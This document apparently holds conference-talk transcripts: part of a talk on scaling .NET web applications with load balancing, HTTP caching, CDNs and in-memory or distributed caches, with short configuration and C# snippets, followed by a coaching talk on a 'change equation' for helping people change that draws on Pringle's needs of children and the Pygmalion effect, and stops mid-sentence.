increments and stays roughly linear, so you can grow in lots of small steps. So if you can, you probably should scale out. It also gives you other good things, such as availability. Scaling the SQL database — now, that's the hard thing to scale out. So you probably shouldn't scale your SQL Server out; scale it up to a reasonable size, a big box, and be done with it. If you really need to go further, there's the option of replicated read databases: since most web applications read a lot more than they write, you can replicate out to read-only databases that hold exactly the same information as your main database and are fast to read from. If you have too much data for one machine, then you have to go with other options — sharding and clustering — and sharding and clustering a SQL database is hard stuff. So if you can, leave that to the Twitter and Facebook guys and just scale up as long as you can, at least for now. When you start scaling out, you need load balancing. If you're lucky, your hosting provider already has a load balancer you can piggyback on. That makes it pretty easy: you just put up two web servers and ask your hosting provider to route to either of them — it doesn't matter which. Of course, if you don't have a hosting provider with a load balancer, you have to get one yourself. There are two options: hardware load balancers and software ones. A hardware load balancer is really just a software load balancer wrapped in expensive hardware, so if you're not afraid to get your hands dirty with Linux and some open source stuff, you can go with the software one. They're also really flexible and have a lot of options.
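As a rough illustration of the software load balancer option, here is a minimal nginx-style sketch with hypothetical backend addresses; the talk doesn't prescribe a particular product, and HAProxy or others do the same job:

    upstream app_servers {
        server 10.0.0.11:8080;
        server 10.0.0.12:8080;
    }

    server {
        listen 80;
        location / {
            # Round-robins requests across the two web servers above.
            proxy_pass http://app_servers;
        }
    }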
So when you have a load balancer, you can use it for other things as well, like terminating your SSL. If you use SSL on your web requests, you can have the load balancer terminate it, so your application servers don't have to spend CPU on it. Most load balancers can also act as a reverse proxy, so if you use HTTP caching, you can have the load balancer cache requests for you. They do it a lot better than IIS does, and you get one less thing to think about. Yes — using the cloud. Our system had to scale really fast for a short period of time, which sounds like the dream scenario for the cloud: you provision ten machines, pay for them for a month, then hand them back, and you've only paid for one month of ten machines. That seemed really attractive. But some resources are really hard to provision, and since we had a very write-heavy scenario — around a thousand write requests per second — we couldn't get the IO we needed from Azure, which we tried, or from Amazon EC2, which we also tried. I don't know if you've logged into a cloud provider and started a virtual machine, but there's really nowhere you can say "I want this much IO". You get CPUs and RAM, and that's it. So we weren't able to use the cloud, unfortunately. It's easy to provision CPU and RAM; not so easy to provision IO. We would also have had to port code, and we only had a short time to do it. So the cloud didn't work out for us — it might for you, even in a similar scenario. To take full advantage of the cloud, especially something like Azure, you have to go with the data stores they want you to use, like Azure table storage, and that was more rewriting than we had time for. And the cloud is usually still more expensive than buying your own hardware, especially if you already have the network engineers that are required. So the cloud might work, might not. Now we've talked about how to scale with hardware, so let's talk about how to make your code more efficient. The key is to take the quick wins first and see where that gets you. You want your software to be able to scale out, but you also want it to scale out as little as possible, because you want it to run efficiently on the machines you have — so you can use two machines instead of five. A few tricks. Use the HTTP cache. You really should learn how HTTP works and how its caching mechanisms work. There's a lot in HTTP caching, and most people don't use it much — they use it a little, but not as much as they could. The trick is to set a long expiration date, say one year, and then when a resource changes, you invalidate the cache simply by changing the URL. The old cached resources just die out after a while, but you don't care — they're on the clients. And again, use your load balancer as a reverse proxy, or invest in a separate reverse proxy. That way the reverse proxy has your resources in memory, and you don't have to serve them from the IIS web server yourself. Adding HTTP caching on Windows and IIS is pretty easy: you can just add a web.config to the folder you want served this way. This one sets max-age to 365 days, so all your static resources can be cached on client machines or on the reverse proxy for 365 days. They probably won't keep them that long, but at least it's possible, and you will reduce the requests for static content by a lot.
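The folder-level web.config being described is roughly this — a sketch using IIS's clientCache element to send a one-year max-age for everything in that folder:

    <?xml version="1.0" encoding="utf-8"?>
    <configuration>
      <system.webServer>
        <staticContent>
          <clientCache cacheControlMode="UseMaxAge"
                       cacheControlMaxAge="365.00:00:00" />
        </staticContent>
      </system.webServer>
    </configuration>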
Once you have started leveraging the HTTP cache, you really should look at whether there's more content you can make static. Look at your web pages: they usually consist of some static information, like news or content you show to every user, and then the dynamic part that is just for me as a user. If you're a newspaper, you'll have a lot of static content and very little dynamic; if you're Facebook, you'll have a lot of dynamic content, because the whole news feed is just for you, while the static part is small. You can then use JavaScript to merge the two together in the UI, or, if you have a reverse proxy, you can use something called Edge Side Includes and merge them together there. And again, use your reverse proxy. You can even save things as files, because files are a lot cheaper to serve than going down into your database. When you have made your content static, you can upload it to a CDN. CDNs — content delivery networks — are great at serving static resources fast, so you should try to keep static content on one if you can. We uploaded all our static content to Amazon S3 and distributed it with Amazon CloudFront, and it worked really well for us. When that's done, you can bundle your requests: minify, bundle and version your JavaScript, use CSS sprites, and bundle dynamic queries together — if you know a page is going to ask for two different resources, ask for them at the same time in the same network call. This makes both the server and the client more efficient, so it improves performance. And the versioning part is what makes it possible to use a long expiration date and push things to the CDN, like we talked about. Then there's internal caching. .NET 4 brought a class called MemoryCache, which is a really nice API for keeping things in memory. It's not distributed, so if you have many front-end servers, the same object may be cached on more than one machine. You can look at something called layer 7 load balancing, which lets the load balancer route requests intelligently to the right web server, or you can use distributed caching. Distributed caching is what all the big sites use: Facebook, Twitter and the other big sites out there use memcached and also Redis. Memcached and Redis run on Linux, so you'll have to use Linux for that — but you shouldn't be afraid of Linux if you want to scale. Here's an example of how MemoryCache works. It's simple: you add a new cache item with a key and an object, and a rule for when the item expires. You can check whether it's there, get it, and remove it — a very simple API. Redis and memcached have much the same kind of API, but you have to make a network call to get the data, so it's a bit more involved. Then, databases. Most of us use SQL Server, and most of us will probably keep using SQL Server. But it's important to realize that different databases are good at different things. If you have a lot of counters on your page, Redis handles that more efficiently than SQL Server. If you have graphs — think Facebook, friends of friends at various depths — that's what graph databases are for. If you need key-value lookups, a key-value store is the way to go. And you can mix and match databases in the same app: it can be a very good idea to use one database for one thing and another database for something else.
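Going back to the MemoryCache example mentioned above, the API described is roughly this — the key name, value and five-minute timeout are made up for illustration:

    using System;
    using System.Runtime.Caching;   // .NET 4

    class CacheExample
    {
        static void Main()
        {
            ObjectCache cache = MemoryCache.Default;

            // Add an item with a key, a value and a rule for when it expires.
            cache.Add("top-news", LoadTopNews(), DateTimeOffset.Now.AddMinutes(5));

            // Check that it is there, read it back, and throw it away again.
            if (cache.Contains("top-news"))
            {
                string news = (string)cache.Get("top-news");
                Console.WriteLine(news);
            }
            cache.Remove("top-news");
        }

        // Stand-in for whatever expensive call you are trying to avoid repeating.
        static string LoadTopNews()
        {
            return "cached content";
        }
    }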
Choose the database based on usage, not out of habit, instead of just using SQL Server for everything. And once you have selected your databases, it's important to understand them. Don't hide every database away behind a generic repository. Domain-driven design has taught us to use repositories that take in and hand out parts of the object graph. That makes a lot of sense from a domain-driven perspective, but from a performance and scaling perspective it's not so good. For the things you want to scale, use the database directly and use it as efficiently as you can — it has more features than get and put. And of course, you still have to join data together. So remember: make as few database calls as you can, and make the calls you do make as cheap as you can. Use the database well, and if that still isn't enough, consider switching to another database, or at least adding one to your existing architecture. When your data starts getting big, try to store it the way it is read. If you have data that is read a lot, make it fast to read, and don't do a hundred joins to get the data you need to show on the page. And mix and match architectures within your app: you have different use cases, some read-heavy, some write-heavy, and both the database model and the code should reflect that. You can't have one cookie-cutter architecture that works for everything — specialize for the use cases you're actually trying to solve. The same goes for normalization in SQL: you usually have plenty of storage, so if it's speed you're after and you have to scale with a lot of data, you may have to denormalize — don't just do it the way you were taught in school. And just as you batch your database calls, batch your network calls. Don't pretend that in-memory calls and network calls are the same thing. Make the code reflect it, and make it visible that you're making an external call. When you do make an external call, get all the data you need in that one call. Then there's caching of those calls: you may want to separate your network calls based on how caching is done, especially if you're using HTTP. You might want a REST endpoint precisely because you can then leverage HTTP caching in your app. But remember that the default behavior in .NET is to bypass the HTTP cache. Here's a picture from MSDN, and as you can see, the default is bypass — that's what most applications get. So if you want HTTP caching on your web requests in .NET, you have to ask for it explicitly. So do that. OK, then there's state. Try to put state on the client, and keep as little user state as you can on your server. Try to avoid sessions: if you use sessions with a lot of users, they slow you down and eat memory. If you really need session-like state, put it in a cache. Since I started paying attention to this, I haven't come across a use case where I actually had to put something in a session — I could put it in cookies, in the URL, or in JavaScript. So keep state on the client. OK, and then there are slow operations. Try to put them in the background, and remember that not everything in a web application has the same priority. This is something people usually do anyway: if you're sending e-mails, put that in the background.
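An aside on the "bypassed by default" point above — assuming the speaker is referring to the request cache policy on outgoing HttpWebRequests, opting in looks roughly like this sketch (the URL is a placeholder):

    using System;
    using System.Net;
    using System.Net.Cache;

    class Program
    {
        static void Main()
        {
            var request = (HttpWebRequest)WebRequest.Create("https://example.com/api/news");

            // Ask for HTTP caching on this request; the default policy bypasses the cache.
            request.CachePolicy = new HttpRequestCachePolicy(HttpRequestCacheLevel.Default);

            // Or switch it on for every request the process makes:
            // WebRequest.DefaultCachePolicy = new HttpRequestCachePolicy(HttpRequestCacheLevel.Default);

            using (var response = (HttpWebResponse)request.GetResponse())
            {
                Console.WriteLine(response.IsFromCache);
            }
        }
    }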
If it's a heavy operation, put it in the background. If it's fast and needs to be synchronous, fine, keep it synchronous. Otherwise, just capture the data, put it on a queue, and return a response that says "here's what's going to happen". If it fails later, you can send an e-mail or something and handle the failure then. Async in general is very good for handling traffic spikes: if you can, make things asynchronous and have many operations in flight at the same time, and you can ride out the spike a bit longer. We didn't have time to bring in a proper messaging architecture, like a service bus or MSMQ. Instead we used a trick from Stack Overflow that just uses the ASP.NET cache to create a timer and run a background task — you schedule whatever work you want, it runs in the background, you process it, and then you schedule it again. That worked pretty well for us for quite a while, until we fixed it properly when we had the time. Someone asked about using async in ASP.NET for this — I'm not sure exactly how that plays out. It will be faster for the user-facing part, but it will still take up a thread, so I think it helps in some places, but it doesn't solve quite the same problem. OK, and then there's the option of reusing existing solutions. Try to reuse solutions you can simply pick up, because they are built to scale, instead of building everything yourself. So, conclusions. Measure everything, everywhere, and gather as much data as you can. Do small iterations, and measure again afterwards — check that you actually made things better. Don't stop thinking about speed and scalability, because once you stop thinking about it, it stops working, or it becomes slow. And embrace other platforms than the ones you are familiar with: do try memcached and Redis and Linux for the things that are not your core domain code, and it will probably be easier, faster and cheaper to scale. There are some other presentations on scaling at this conference — a lot of them are tomorrow, and you should go and see them. Yeah. Questions? No — thank you.
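For reference, the cache-expiration trick referred to above is usually written along these lines — a sketch, not the code from the talk; the DoWork method and the two-minute interval are invented, and the usual caveat applies that an app-pool recycle silently stops it:

    using System;
    using System.Web;
    using System.Web.Caching;

    public static class BackgroundTimer
    {
        private const string Key = "background-task";

        public static void Start()
        {
            // The cache entry acts as a poor man's timer: when it expires,
            // the callback below fires and re-registers it.
            HttpRuntime.Cache.Insert(
                Key, new object(), null,
                DateTime.Now.AddMinutes(2),
                Cache.NoSlidingExpiration,
                CacheItemPriority.NotRemovable,
                OnExpired);
        }

        private static void OnExpired(string key, object value, CacheItemRemovedReason reason)
        {
            DoWork();   // whatever slow, low-priority work was pushed to the background
            Start();    // keep the "timer" ticking
        }

        private static void DoWork() { /* e.g. send queued e-mails */ }
    }

Calling Start() once from Application_Start is enough to keep it running.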
|
Having a popular web site is great, but what do you do when you can't handle the load anymore? When throwing hardware at the problem only gets you so far, where do you continue? And how can you fix it by this afternoon? This talk is based on the lessons learned from building two web sites where the user numbers got out of hand, and there was very limited money, time and hardware to throw at the problem. While the user growth continued, there was no time to lose and the developers had to learn how to scale in a hurry. This session will give a lot of tips and tricks on how to scale your .NET apps on the web.
|
10.5446/51417 (DOI)
|
Hi! Hi! I'm Kristoffer Sønnsed, and I work for ProgramUtvikling. I'm here to give away three of Jeff's books — they're brand new, we have them right here, and you could be the first to get one. So during the session, tweet about it — grab your phone if you need to. Thanks. Welcome, everyone. Thanks for coming. My name is Jeff. As you know, this session is about how simple maths and belief can help you get people to change. I know this conference has a fairly strong agile slant to it, but this talk isn't specifically focused on agile. It's focused on whatever situation you find yourself in where you need to help someone change, or where you want to change something yourself — and on what you can do to make that change more likely to succeed. You can look at this from the position of a manager or a leader, a Scrum master, a coach, maybe a friend. The principles and practices I'm going to talk about are focused on one-to-one situations, but they can be applied to team situations as well, so hopefully there's something in this you can take away. A quick overview: the structure of the talk is based on four parts. The first is simply to revisit the question of why people find it so hard to change — why it is naturally difficult for people like you and me to change. Then I'll introduce you to one of the models I use when I coach people through change, which I call the change equation — that's the simple maths part. I'll also introduce you to a rather different piece of research that I stumbled across, which is surprisingly relevant to helping people change even though it's about bringing up children; you'll see the analogy to the situations we find ourselves in. And then we'll wrap up with another model I use, which involves belief — I'll say more about that when we get there. This is the first time I've given this talk live, so I'm not sure whether I'll have time at the end for questions or not. I hope so, but I can't promise. If I run out of time, I'll give you my contact details and we can follow up afterwards. So, over to you to begin with. I'd like to ask you a question: why do you think people can't change? Why do people find it so hard to change? Fear. Exhaustion. What else? Things are OK as they are — yes, OK, let's capture that. What was that? They're at a local maximum. OK, so they have this little bubble they're comfortable in, and to get out of it they have to go through something worse before things get better. That's interesting — whatever they move towards might be better, but it will feel worse for a while. OK, thanks for joining in; that bodes well. My view — one of my mottos, my modus operandi if you like — is that people don't necessarily fear change itself; what they fear is what they have to give up, what they have to leave behind, in order to change. And I think that's what we're talking about with this local-optimum bubble: things are OK. Whatever it is — a habit, a behaviour, a way of working, the mental models we carry, the way we see the world — those things are part of us.
And we have to leave something that is part of us behind in order to move on to something else — something that has become comfortable and well worn. So we need to be aware of that. And the process isn't simple; it's not as simple as A, B, C. Whatever it is we need to change or want to change, first we have to be aware of it, and sometimes we simply aren't. A rather trivial, personal example, if you like: one of the things I've done is record myself, so I can hear the things I like and the things I don't like about how I speak. One of the things I noticed, listening to this talk played back to me, was that every so often, when I take a breath, I make this little sound. You might not have noticed it if I hadn't said anything — although now, I'm afraid, it's the only thing you'll notice for the rest of this talk. I wasn't aware of it until I listened to the recording of myself. And even once I was aware of it — if someone had simply told me, or criticised me for it — I might just have carried on doing it. So we have this: first we have to become aware, and once we are aware, we actually need a certain amount of bravery to do something about it. Now, there's something more fundamentally psychological that we may have to deal with first. There's an interesting paper — worth reading if you get the chance — by David Rock, who drew on a study done at UCLA in America, by Eisenberger. Those studies focused on the brain and how it feels to be rejected. I'm not so interested in the rejection part, but one of the things they showed is that we, as human beings, crave certainty. They did this by putting problems in front of people that had no correct answer, or situations where they were unsure what to do, and they measured, with functional MRI scans, which areas of the brain lit up in those situations. What they found was that the same areas of the brain lit up in situations of ambiguity and uncertainty as lit up when people were in physical pain. So what they established is that we are hard-wired to avoid uncertainty, hard-wired to avoid ambiguity, and we try as hard as we can to avoid it. And what change does is expose us to uncertainty — because there's a chance it might not work, and we might have lost something in the process. I'm not sure if you're familiar with the work of the great Australian philosopher Kylie Minogue — better the devil you know. You may remember her from the 1980s. I keep coming back to that line, because I come across a lot of people who know that things aren't working perfectly for them, who know things aren't great, and yet would rather stick with what isn't working than risk the unknown. I've had people say to me, quite explicitly: I'd rather have a certain thing I know than an uncertain thing I don't. It's a real phenomenon. We have to be willing to go into the unknown, if you like. And then, once we're there, we need commitment — because once we realise we need to do something, it's not just a matter of writing a cheque and saying, there you go, I'll buy the new behaviour, I'll change my practice — there you are, a thousand kroner.
The muscle memory, the habits and behaviours that have taken years to build have to be unlearned and replaced with new behaviours and new habits, and that takes a lot of time. Over that time it's very hard to connect today's small decisions with the long-term consequences. If, for example, I want to lose weight, and I wander around the expo downstairs and see all the stands with little sweets and chocolates and fizzy drinks, I think: what harm is one chocolate going to do? It's very hard to tie a single chocolate to the long-term outcome. So change takes commitment over time — discipline. That's why change is not simple. Now, I want to introduce you to my change equation. This is where the simple maths comes in. I was a little worried that having maths in the title would scare people off — so have I got you here under false pretences? I got the maths geeks in, did I? Fantastic. I'm not a maths geek, and I'll try to keep it simple. So this is my change equation. I believe there are three factors at play, and they all come into the picture when someone is deciding whether to change or not. The first factor is that there has to be something in it for me: the idea that where I'm moving to is more beneficial, better for me, than where I am now. The second is the probability that the change will succeed. It's not guaranteed — we have to bear that in mind — and it might not turn out as good as we thought it would. That probability factors into our decision to do it or not. And the third factor is the cost of the change. The cost has a number of different elements. There can be a real, absolute cost: if, for example, I decided I wanted to get fit, I might have to join a gym — that's a cost to me, and it would be a cost for you too. And to get fit I'd have to give up my nice comfort zone, give up an extra hour in bed in the morning, or sitting in front of the football on the sofa. I have to give those things up in order to get it. So there's a cost there. And there's an interesting thing about cost in this regard: it's not enough for the change to be merely worth it — the benefit times the probability has to be clearly greater than the cost. There's an economic concept that comes into play here — I'm never sure how to pronounce it — which is essentially the endowment effect. It says that we place a higher value on something we already have, simply because we have it, than on the same thing when we're trying to acquire it. The simplest way to illustrate it: if I gave you a thousand kroner, you would get a certain amount of satisfaction from that — you'd be happy, I think. If I then took that thousand kroner back off you, the dissatisfaction you'd feel would be greater than the satisfaction you had when you received it. You see what I'm saying? It's not symmetric. Economists think this is irrational — a thousand kroner is a thousand kroner, it shouldn't matter — but it's reality: people are irrational, and you have to take that into account. So if the benefit is a thousand kroner and the cost is a thousand kroner, I'm not going to do it. We have to weigh up those parts of the equation. Now, what I would say is that as a coach, or if you take on a coaching role, you can influence the parts of this equation — for yourself, or for the person you're trying to help.
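One plausible way to write down the relation being described — this notation is my reading of it, not copied from the slides:

    % B = perceived benefit of the new state
    % P = probability that the change actually succeeds
    % C = cost of changing (money, effort, lost comfort, the endowment effect)
    \[ \text{change is worth attempting when} \quad B \times P > C \]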
Yes — a question: you're assuming people want to change, but what about when the change is forced on them? So the question is whether this only holds for change that is voluntarily entered into. I think being forced definitely affects it. It actually ties into something coming up later, because change is more likely to be successful — the probability of success is greater — when the person undergoing the change is open to it, or has at least accepted it. So it's a very valid point: when change is forced on people, the cost probably looks bigger and the benefit smaller, and they're less committed to making it succeed because it isn't theirs. So yes, I think forcing change matters a lot; it just makes it harder to get to a positive outcome. Does that make sense? Yes. There was another comment there — I couldn't quite follow the question, I'm afraid. OK. Stick with me and see where it goes. So, I said I would introduce you to a rather different piece of research. I came across some work that was done in the 1950s and 60s, and data that's fifty or sixty years old is generally considered to be a bit dated, I suppose, so bear that in mind. The work I'm talking about here — Mia Kellmer Pringle's "The Needs of Children" — is based on data from the 1950s and 1960s, and on a study that was sponsored by a UK government department for health and social services; bear in mind too that it was a sponsored study. Anyway, I came across this book, I read it, and I thought it was surprisingly relevant — relevant to the situations I find myself in, the people I work with and the people I coach.
And what keeps them going, in a way, is praise and recognition — that's a good thing, well done. The fourth need that was identified was the need for responsibility. Now, my intention here is to go through these four needs from two perspectives. The first is the original perspective, Pringle's perspective, looking at bringing up children. The second is to try to draw an analogy to what we do — coaching grown-ups, coaching change — and how we can use these needs to influence the change equation and make change more likely to succeed. So that's what I'm going to do. We'll start with love and security. Love and security is, in Pringle's view, the fundamental need — the prerequisite, if you like. Without it, the other needs don't have much of an effect on the children. With it, they have a stable, dependable base that they can venture out from safely. They can mess up from time to time without needing to keep up appearances. The love and security were unconditional — not given in return for anything. And there was consistency to it as well: if I do X, I can predict what will happen. Consistency and routine were built into it. So those are the things Pringle highlighted, and I want to relate them to the world we live in. And I have another question for you: can you coach somebody you don't like? What do you think? Who thinks you can? OK — about half, and the other half didn't put their hands up either way. A bit of a mixed response. My view is that it is possible, but — and this is the point — if you go into it with a genuine belief in what they can do, if you have respect for them, respect for their potential and their capabilities, you are far more likely to succeed in your job of coaching them, in your role of coaching them. An interesting study I'd like to throw into the mix here, which is often referred to, is the Rosenthal and Jacobson study, also known as the Pygmalion effect. Has anyone heard of this? It was a study done in schools, where a group of researchers gave a class an IQ test. They didn't share the results of that IQ test with anyone; they kept the information to themselves. But what they did was go to the teachers of that class and say that 20% of the children — chosen at random — were, over the coming twelve months, going to bloom, to do fantastically. They said: look out for these children, they're going to be great. Twelve months later — and nothing else had changed — those children had bloomed. Their IQ, when they were tested again, was statistically significantly higher than the others'. Those children had bloomed. So the effect is that simply because the teachers believed those children were going to become more intelligent, they did. It wasn't magic: because the teachers believed it, they treated those children in a way that made it happen. So my question to you is: what do you think your teams, your colleagues, the people you coach, could be capable of if you genuinely believed in them? It's a rhetorical question, of course. Now, one point I want to make here, which I very rarely hear mentioned about coaching: many people say that the person being coached must have respect for the coach, but few people talk about it as a two-way thing. In my opinion, this respect must be two-way. Respect is key here.
Pringle talks about love and security. I'm not going to talk about love and security; I'm going to talk about respect and safety — that's the analogy for me. So here's my question — you've had a preview of this, you've had time to think. What has someone done that helped you feel safer around them? They made themselves vulnerable to you — which increases your trust in them, which makes you more willing to trust them in return. Fantastic. OK, anyone else? I'm doing something I shouldn't, aren't I: I've put someone on the spot and asked them about feeling safe. There's a certain irony in that. Safety is an elusive concept in many situations. Yes, we need to make people feel safe — but how do we do it? The simplest thing, and the first thing to focus on, is confidentiality: simply agreeing ground rules, in a way — what is said here stays between us. And I'm a big believer in making yourself vulnerable first, and trusting them, to create that sense of safety. Now, what's going on here? In case it isn't obvious, it's President Obama and the UK Prime Minister, David Cameron, watching a bit of basketball. What's happening? Mirroring — fantastic, thank you. Mirroring, or matching, is one of the oldest techniques there is for building trust, for building rapport. What happens when you mirror or match someone is that you're effectively signalling to that person, "I am like you", which creates a sense of connection — and people generally like people they perceive as being like them. It doesn't have to be visual and physical, like body posture, though it can be. It can be tone of voice, it can be attitude, it can simply be the words you use — matching those and playing them back. It's about tribes: it speaks to whether you're one of my tribe or not, whether I like you or you like me. You have to be careful with this, though, because you can overdo it. There's Cameron getting very comfortable with his new pal. It's easy to overdo, and when that happens it looks like you're trying to manipulate the person, or patronise them, and it can have the opposite effect to the one you intended. Done well, though, it builds a sense of trust and rapport — a sense of partnership, if you like. And when we have that trust and that partnership, I'm not in this on my own, I can open up more, I'm more able to take risks. Now, one of the ironies of this is that you're probably already very good at mirroring and matching appropriately. But if you're anything like me, now that it's been drawn to your attention, you'll start noticing yourself doing it and think: oh no, is this obvious? Am I doing a David Cameron? And just to reassure you — it stops being conscious after a while. Eventually you'll just forget about this and go back to being your normal, excellent mirroring, matching selves. Something else in terms of building up rapport is a concept known as perceptual affinity. I'm drawing on a lot of studies here; this one is by three people — Goldstein, Martin and Cialdini — and they found that waiters and waitresses who repeated back exactly what was ordered to the diners received 70% more in tips than those who didn't, simply by saying exactly the same words. What they found that did was establish a sense of "I'm being listened to".
Therefore you care for me. Therefore we have a connection, and I'm more likely to reward you. Now, when it comes to coaching we're not usually looking for a tip. What we're looking for with this kind of active listening, playback and connection is the gift of trust — the gift of rapport. And once we have that, we can use it to help them; we're building up this relationship. So how can that play out in the field of coaching? Well, just listen. Remember what people are saying. Show that you remember. What are their children's names? Have they got anything important coming up? Anything that's worrying them that you can ask them about? Just show that you're interested, show that you're listening, show that you care. And then we have it — we have that respect. This respect and safety is just like the love and security that Pringle found: it is the fundamental thing you need in order to coach somebody. It gets you in the door. It gives you the opportunity to start positively influencing their situation and that change equation. OK, back to Pringle. Need number two: new experiences. Now, what Pringle was talking about here were age-relevant and competency-relevant new challenges — for example, learning to crawl, learning to walk, learning to talk. Things that were put in front of the child when they were ready for them. What she found was that these tasks, these challenges, should be challenging — difficult — but also achievable, and that they were stepping stones for later development. So as well as being valuable in their own right — learning to crawl is valuable in its own right, you can get across the room — they were also stepping stones to being able to walk, which is the stepping stone to other things as well. Baby steps, if you like, if you'll forgive the pun. Now, the bottom three bullet points on this slide are, I think, particularly relevant to the world of work we're in at the moment. The first one is about the need to learn how to learn: these new experiences were key in helping children learn the process of learning. And in more and more of the companies and teams I work with, I find adults need to relearn how to learn — we have to learn new things so often. Secondly, play is important to learning. I'm going to talk a little more about play later on. She found children who learnt through play learnt quicker and learnt deeper, which I think is still relevant to adults: no matter how much we might like to say how sensible and mature we are, we still like to play now and again. And the third one: if you've ever come across anybody who seems a little bit, as it says here, passive, fearful or irritable when faced with something new, it's often the result of how their previous experiments — their attempts to learn or to change — have been dealt with. If they've been met with disapproval or discouragement, or even worse, punishment, then they're less likely to try something new again. They'll retreat back into their shell. So these are things to bear in mind. So how can we use this in our situation as a coach? Well, the first thing is around making clear what this is all about. Why are you doing this? Making it personal, visualising and clarifying the purpose of this change. As an example, if my idea was to lose weight: what is losing weight going to do for me? What will it feel like for me? Why should I do that? There's got to be a reason for it.
If I was coaching a team, for example, and in the retrospective, I might ask the question, so how would you rate yourselves on a scale of one to ten on communication? And I get some answers ranging probably between five and eight. Nobody really wants to say ten, nobody wants to say one, they'll have somewhere around there. Which is a good thing, we've got something to build on. That's always helpful. But equally, I could follow that up with, so what would ten mean to you? Why would it be valuable to you to achieve ten out of ten on communication? What would that look like? What would that feel like? And by making that more tangible, making that more personal to them, we'll increase the benefit to them of that change, increasing the B on the change equation, if you will. Someone who did this quite well was a guy called Roberto Goizueta. You may be familiar with him; he used to be the chairman, CEO and MD of Coca-Cola. And one thing he famously did was he created a goal, a challenge, for the company a number of years ago. He worked out that on average, everyone, all of the six billion people on the planet, they consumed 64 ounces of liquid a day. He worked this out. He also found that on average a person consumed two ounces of Coca-Cola products a day. Two ounces out of their 64 ounces. And he challenged the company to go after that 62-ounce gap. The first step in going after that gap was to grow the Coke intake, the Coke share, from two ounces to four ounces. And that was designed to motivate the people at Coca-Cola. There were two things about it that made it motivating. The first was the way the gap was framed. People can believe that somebody consumes 64 ounces of liquid a day; they can believe that. They can also believe that only two ounces of it is Coke, and that going from two ounces to four ounces doesn't seem like too much of a stretch. It feels achievable; it's not too far to go. And the second thing is that goals people feel some ownership of, goals that mean something to them, are the ones they are more likely to commit to. It's important to find out what they want to do, what they think, why it matters to them. People are more likely to pursue a goal that is theirs. Coming back to Pringle's comment about challenges needing to be stretching but achievable: it's important not to overdo it. You've all heard of the Goldilocks effect; you've all heard the Goldilocks story. Those of you who were in my other session have experienced it first hand, which is fantastic. One is too hot, one is too cold, and one is just right. That maps straight onto Pringle's comment that these challenges must be difficult but doable. That's what we call the Goldilocks effect: something that is stimulatingly difficult, but not overwhelmingly so. If it's too easy, we're not interested; it doesn't motivate us. If it's too hard, we give up. One of the things we can do as coaches is help break the challenge down, help chunk it into pieces that feel more achievable - the two-ounce gap rather than the 62-ounce gap, if you like. Another thing we can do is help make the things people don't want to do a bit more fun. So here's something I know how to do: we're going to mix things up a little.
I need a little warm-up first, otherwise this isn't going to go over very well. So here's what I need, especially from you at the front, because you know what's coming. I need a beat! I need you to do it with a stomp and a clap, and I'll do the rest. I've got five flights today and I can't do it all myself. It's just a little warm-up, and I'll do the rest. Are you with me? So it's going to be a stomp, clap, stomp, clap. Come on: stomp, clap, stomp, clap. There it is. Keep it going. This is flight 372 on SWA. The flight attendants on board serving you today: Teresa in the middle, David in the back. My name is David and I'm here to rap. First things first: soft drinks and coffee you already know about, but if you want another kind of drink, then just holler. Alcohol will be four dollars, and if a Monster energy drink is your plan, that will be three dollars and you get the can. We don't want your cash; you'll be paying with plastic. If you have a carry-on bag, that's fantastic: push it under the seat in front of you and stow everything away nice and tight. If you're sitting in a row with an exit, we'll need to have a word with you, so you need to be willing and able to assist. Before we leave: switch off the electronics, fasten your seatbelt, put up the tray tables and stow it all away. Sit back, relax, have a good time. It's almost time to go, so I'm through with the rap. Thank you - that's Southwest. Wonderful. We'll come back to that rap a little bit later. But just to gather up where we've got to so far: we've now been through two of Pringle's needs. The first, love and security, or in our case respect and safety. That's the fundamental, baseline thing we need to have so that we can actually start on this change at all. Once we have that, once we're trusted, we can address the second need, new experiences: making the change personal to this person, making it clear what it means to them, and breaking it into achievable steps. And that is part of what we can do to help reduce the cost of the change, as well as increase the benefit. Now we move on to the third need, which is praise and recognition. Back to Pringle. Pringle found that praise and recognition are needed, just as learning is needed. It's also based on learning being unhurried, and on success being considered to be inevitable. There are plenty of parents who have wanted their children to learn faster than they were ready for; they don't need to do that. They give lots of praise, and they praise and praise. It's actually that sense of inevitability that leads to the Pygmalion effect. And Pringle found that where praise and recognition are present, there is also an element of intrinsic motivation. Now, here's a date for you: the 21st of April 2013. I wouldn't expect any of you to realise why this is an important date in the UK. I was unaware of it until I stumbled across a particular study. Apparently on the 21st of April 2013, this was the date statistically that most women in the UK started their diet. This is when they started trying their plan to achieve their summer bikini body. I can point you to the study if you don't believe me.
They found that this was because it was 13 weeks before their children finished for their summer holidays. On average, women in the UK wanted to lose between 11 and 13 pounds of weight before the summer. What they've done, effectively, is they've paced it out. 13 weeks to lose 11 to 13 pounds, that's achievable, that's unhurried. It's almost inevitable I can lose a pound a week. They've made their change more likely to be successful by setting themselves a sustainable pace to change. I don't know if you guys have used or still use the Wii Fit. Obviously other consoles are available and not sponsored by Microsoft or anything like that. Is it Microsoft? But this is another thing you can use to make sure that learning is unhurried. There's an extra element to this Wii Fit, which is effectively that the Wii Fit acts as your coach. I don't think it actually lets you set an overly aggressive goal for yourself. It plots your progress, your small successes. You can see your trend and the activities are a little bit like the Southwest Airlines. They're fun. There's something else built in there, the camaraderie. A little bit of competition perhaps, but also a little bit of camaraderie with your friends, your colleagues, your family maybe. This is again, learning is unhurried. You can set your own pace. It's treated as though success is inevitable, which helps the motivation. That's obviously an example of gamification. Gamification is becoming rather prominent in the workplaces that I see these days. Turning work into a little bit more like a game, generating voluntary involvement and engagement. And offering regular achievements. 60 levels, 60 achievements here. I don't know how many levels there are on Angry Birds, but you don't have to wait until you finish them all to get a sense of achievement. Regular achievements are put in front of people. And that's acting effectively as some praise, as some recognition of your effort so far. You haven't finished the game yet, but okay, you've unlocked this. This is good. This keeps people motivated. Change is often a long path, and these are little breadcrumbs of sustenance along the way, keeping us interested. It's an extrinsic motivation. Do this, and I will give you this reward. That's not necessarily a bad thing. Another explicit example of an extrinsic motivator here in terms of praise and recognition. This is some people, this is from my time at BT, in fact, where we set up some agile awards. So on the right hand side there you've got the best agile team, I don't know when it was, 2004 or something. And on the other side you've got the best agile champion. These people were voted for by their peers, they were given recognition by people that they respected. Going back to Pringle's view that it's reinforced, the success, and the feeling of success is reinforced by someone that you respect, also thinking it's a good thing. So this is respect and recognition by your peers being reinforced. Another extrinsic motivator. Coming away from extrinsic motivators a little bit, recently I was in the States and I was faced with the prospect of a very long drive. I had to drive for seven hours, pretty much continually. And I was not looking forward to that. On my own in a car, I thought I had to drive for seven 